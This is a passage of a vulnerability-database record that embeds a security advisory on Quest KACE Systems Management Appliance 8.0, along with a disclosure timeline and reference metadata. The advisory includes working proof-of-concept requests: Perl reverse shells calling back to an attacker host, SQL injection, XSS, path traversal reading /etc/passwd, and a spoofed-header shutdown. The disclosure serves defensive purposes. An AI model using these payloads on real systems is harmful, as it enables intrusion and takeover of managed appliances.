*Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. 
\n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. 
\n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7.8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends on each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. 
\n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. 
\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). 
\n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\nA command injection vulnerability exists within this message queue which\nallows us to append arbitrary commands that will be run as root. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. \n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. In particular, a blind\ntime based type. 
\n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. In particular, an error based\ntype. \n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: 
qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scripting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. 
\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. 
*Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . 
\ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nchannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. 
Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nQuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involve\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. 
Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers\u0027 names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity \u0026 access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. 
This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11140",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-15386",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.2
},
{
"db": "VULMON",
"id": "CVE-2018-11140",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"id": "VAR-201805-0600",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
}
]
},
"last_update_date": "2023-12-18T12:01:57.580000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/jp-ja/products/kace-systems-management-appliance/"
},
{
"title": "Patch for QuestKACESystemManagementApplianceSQL Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/137459"
},
{
"title": "Quest KACE System Management Appliance SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81226"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/148005/quest-kace-system-management-appliance-8.0-build-8.0.318-xss-traversal-code-execution-sql-injection.html"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
